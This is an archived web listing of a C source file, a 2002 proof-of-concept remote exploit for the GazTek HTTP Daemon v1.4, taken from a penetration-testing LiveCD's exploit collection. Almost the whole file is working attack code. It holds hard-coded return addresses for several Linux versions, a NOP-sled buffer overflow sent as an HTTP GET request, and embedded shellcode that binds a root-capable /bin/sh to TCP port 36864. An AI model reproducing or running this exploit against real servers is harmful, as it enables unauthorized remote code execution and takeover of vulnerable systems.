home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / gaztek / PRPghttpd.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  8.5 KB  |  295 lines
  1. /* PRPghttpd.c
  2.  
  3.          This program is free software; you can redistribute it and/or
  4.          modify it under the terms of the GNU General Public License
  5.          as published by the Free Software Foundation; either version 2
  6.          of the License, or (at your option) any later version.
  7.  
  8.          This program is distributed in the hope that it will be useful,
  9.          but WITHOUT ANY WARRANTY; without even the implied warranty of
  10.          MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  11.          GNU General Public License for more details.
  12.  
  13.          You should have received a copy of the GNU General Public License
  14.          along with this program; if not, write to the Free Software
  15.          Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  16.          02111-1307, USA.
  17.  
  18.          -
  19.  
  20.          PYR/\MID, Research Project
  21.          Author: flea
  22.          Date: October 7, 2002
  23.          Members: Apm, flea, thread
  24.  
  25.          Proof of Concept Remote Exploit for GazTek HTTP Daemon v1.4-3
  26.  
  27.          Works on:
  28.          i386 Redhat 7.2
  29.          i386 Redhat 7.3
  30.          i386 Slackware 8.1
  31.  
  32. */
  33.  
  34. #include <stdio.h>
  35. #include <stdlib.h>
  36. #include <string.h>
  37. #include <unistd.h>
  38. #include <sys/types.h>
  39. #include <sys/socket.h>
  40. #include <netinet/in.h>
  41. #include <arpa/inet.h>
  42.  
  43. #define NOP                     0x90
  44. #define MIN_BUFFER_SIZE                  198
  45. #define MAX_IP_LENGHT                  15
  46. #define GAZTEK_PORT                  80
  47. #define BIND_PORT               36864
  48.  
  49. void synops(char *argv[]);
  50. int main(int argc, char *argv[]);
  51. void get_ban(char *ban_addr);
  52.  
  53. #define ARCH_NUMBER                  4
  54.  
  55. struct arch {
  56.          int id;
  57.          char *os;
  58.          long addr;
  59.          int adjusted_buf;
  60. } architectures[] = {
  61.                            {0, "GazTek HTTP Daemon v1.4/i386 RedHat 7.3 Linux", 0xbfffb9c0, 0},
  62.                            {1, "GazTek HTTP Daemon v1.4/i386 RedHat 7.3 Linux", 0xbfffb6b0, 0},
  63.                                 {2, "GazTek HTTP Daemon v1.4/i386 RedHat 7.2 Linux", 0xbfffb658, -1},
  64.                           {3, "GazTek HTTP Daemon v1.4/i386 Slackware 8.1", 0xbfffb50c, -32}
  65.                        };
  66.  
  67. char bindshell[] =
  68.         "\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c"
  69.         "\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46"
  70.         "\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89"
  71.         "\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c"
  72.         "\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66"
  73.         "\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86"
  74.         "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f"
  75.         "\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
  76.         "\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";
  77.  
  78. void synops(char *argv[])
  79. {
  80.          int i;
  81.  
  82.          printf("PYR/\\MID, Research Project 02\n");
  83.         printf("GazTek HTTP Daemon v1.4 remote exploit, by flea.\n");
  84.         printf("SYNOPS: %s [-b <banner>] -d <arch> <ip> <remote>\n\n", argv[0]);
  85.         printf("<ip>            - ip address to check lenght\n");
  86.         printf("<remote>        - remote target ip addr\n");
  87.         printf("<arch>          - remote architecture id\n");
  88.         printf("<banner>        - ip addr to check banner\n\n");
  89.          printf("Architectures id:\n");
  90.  
  91.         for(i=0; i<ARCH_NUMBER; i++)
  92.                  printf("\t%d, %s, 0x%x\n", architectures[i].id, architectures[i].os, architectures[i].addr);
  93.  
  94.          exit(0);
  95. }
  96.  
  97. void get_ban(char *ban_addr)
  98. {
  99.          int i, sock_fd;
  100.          char *read_buf, *read_buf_toked, *ptr;
  101.          struct sockaddr_in target;
  102.  
  103.          if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) < 1)
  104.          {
  105.                   printf("socket() error.\n");
  106.                   exit(-1);
  107.          }
  108.  
  109.          target.sin_family = AF_INET;
  110.          target.sin_port = htons(GAZTEK_PORT);
  111.  
  112.          if((target.sin_addr.s_addr = inet_addr(ban_addr)) == -1)
  113.          {
  114.                   printf("\"%s\" is an invalid ip address.\n", ban_addr);
  115.                   exit(-1);
  116.          }
  117.  
  118.          bzero(&(target.sin_zero), 8);
  119.  
  120.          if((connect(sock_fd, (struct sockaddr *)&target, sizeof(target))) == -1)
  121.          {
  122.                   printf("connect() error.\n");
  123.                   exit(-1);
  124.          }
  125.  
  126.          if((write(sock_fd, "HEAD HTTP /\n\n", 13)) == -1)
  127.          {
  128.                   printf("write() error.\n");
  129.                   exit(-1);
  130.          }
  131.  
  132.          read_buf = malloc(256);
  133.          read_buf_toked = malloc(256);
  134.  
  135.          if((read(sock_fd, read_buf, 256)) == -1)
  136.          {
  137.                   printf("read() error.\n");
  138.                   exit(-1);
  139.          }
  140.  
  141.          strcpy(read_buf_toked, read_buf);
  142.          ptr = strstr(read_buf_toked, "Server");
  143.          ptr = strtok(ptr, "\n");
  144.  
  145.          printf("%s\n\n", ptr);
  146.  
  147.          printf("****** FULL HEADERS ******\n");
  148.          ptr = strtok(read_buf, "\n");
  149.  
  150.          for(i=0; i<4; i++)
  151.          {
  152.                   ptr = strtok(NULL, "\n");
  153.                   printf("%s\n", ptr);
  154.          }
  155.          printf("****** FULL HEADERS ******\n");
  156.          exit(0);
  157. }
  158.  
  159. main(int argc, char *argv[])
  160. {
  161.          int c, c_size, ip_lenght, arch_id, sock_fd, errflg=0, ban_chk=0, exp_flg=0;
  162.          char *addr, *get_buf, *get_buf_str;
  163.          long ret;
  164.  
  165.          extern char *optarg;
  166.          extern int optind, optopt;
  167.  
  168.          struct sockaddr_in target;
  169.  
  170.          if(argc == 1)
  171.                   synops(argv);
  172.  
  173.          while((c = getopt(argc, argv, "b:d:")) != -1)
  174.          {
  175.                   switch(c)
  176.                   {
  177.                            case 'b':
  178.                                     addr = malloc(strlen(optarg));
  179.                                     strcpy(addr, optarg);
  180.                                     ban_chk++;
  181.                                     break;
  182.                            case 'd':
  183.                                     if(!(argv[optind]))
  184.                                              errflg++;
  185.                                     if(!(argv[optind+1]))
  186.                                              errflg++;
  187.                                     if(errflg == 0)
  188.                                     {
  189.                                              if((arch_id = atoi(optarg)) < 0 || (arch_id = atoi(optarg)) > (ARCH_NUMBER-1))
  190.                                              {
  191.                                                       printf("Invalid architecture id.\n");
  192.                                                       exit(-1);
  193.                                              }
  194.  
  195.                                              if((inet_addr(argv[optind])) != -1)
  196.                                                       ip_lenght = strlen(argv[optind+1]);
  197.                                              else
  198.                                              {
  199.                                                       printf("\"%s\" is an invalid ip address.\n", argv[optind]);
  200.                                                       exit(-1);
  201.                                              }
  202.                                              addr = malloc(strlen(argv[optind+1]));
  203.                                              strcpy(addr, argv[optind+1]+1);
  204.                                              exp_flg++;
  205.                                     }
  206.  
  207.                                     break;
  208.                            case ':':
  209.                                     errflg++;
  210.                                     break;
  211.                            case '?':
  212.                                     errflg++;
  213.                   }
  214.          }
  215.  
  216.          if(errflg > 0)
  217.                   synops(argv);
  218.  
  219.          /* check banner info */
  220.          if(ban_chk > 0)
  221.                   get_ban(addr);
  222.  
  223.          if(!(exp_flg))
  224.                   synops(argv);
  225. /*
  226.         Buffer Size Craft Relation
  227.         min string size                    = 192 bytes
  228.         string "GET _" size                =   4 bytes
  229.         max log ip size "255.255.255.255"  =  15 bytes
  230.         string "\n\n" size                 =   2 bytes
  231.                                            = 198 bytes
  232.                                                         */
  233.          /* dont count with GET request and newline bytes */
  234.          c_size = ((MIN_BUFFER_SIZE+15-ip_lenght-4-2)+(architectures[arch_id].adjusted_buf));
  235.          /* NULL string byte */
  236.          c_size = c_size+1;
  237.  
  238.          /* builds crafted buffer */
  239.          get_buf = malloc(c_size);
  240.          /* counts with all constants sizes */
  241.          get_buf_str = malloc((c_size+4+2));
  242.  
  243.          memset(get_buf, NOP, c_size);
  244.          memcpy(get_buf+(c_size-1-4-strlen(bindshell)), bindshell, strlen(bindshell));
  245.          *(long*)&get_buf[c_size-4-1] = architectures[arch_id].addr;
  246.          get_buf[c_size-1] = '\0';
  247.  
  248.          /* final buffer, now just inject on connection */
  249.          sprintf(get_buf_str,"GET %s\n\n", get_buf);
  250.  
  251.          /* infos */
  252.          printf("target: %s\n", addr);
  253.          printf("arch id: %d, %s, 0x%x\n", architectures[arch_id].id, architectures[arch_id].os, architectures[arch_id].addr);
  254.          printf("ip size: %d bytes\n", ip_lenght);
  255.          printf("Adjust: %d bytes\n", architectures[arch_id].adjusted_buf);
  256.          printf("buffer size: %d bytes\n", strlen(get_buf_str));
  257.          printf("bind shellcode size: %d bytes\n", strlen(bindshell));
  258.          printf("bind shell tcp port: %d\n", BIND_PORT);
  259.          printf("Injecting code at 0x%x...\n", architectures[arch_id].addr);
  260.  
  261.          /* start socket() */
  262.  
  263.         if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) < 1)
  264.         {
  265.                 printf("socket() error.\n");
  266.                 exit(-1);
  267.         }
  268.  
  269.         target.sin_family = AF_INET;
  270.         target.sin_port = htons(GAZTEK_PORT);
  271.  
  272.         if((target.sin_addr.s_addr = inet_addr(addr)) == -1)
  273.         {
  274.                 printf("\"%s\" is an invalid ip address.\n", addr);
  275.                 exit(-1);
  276.         }
  277.  
  278.         bzero(&(target.sin_zero), 8);
  279.  
  280.         if((connect(sock_fd, (struct sockaddr *)&target, sizeof(target))) == -1)
  281.          {
  282.                 printf("connect() error.\n");
  283.                 exit(-1);
  284.         }
  285.  
  286.         if((write(sock_fd, get_buf_str, strlen(get_buf_str))) == -1)
  287.         {
  288.                 printf("write() error.\n");
  289.                 exit(-1);
  290.         }
  291.  
  292.          printf("Done!\n");
  293.  
  294. return 0;
  295. }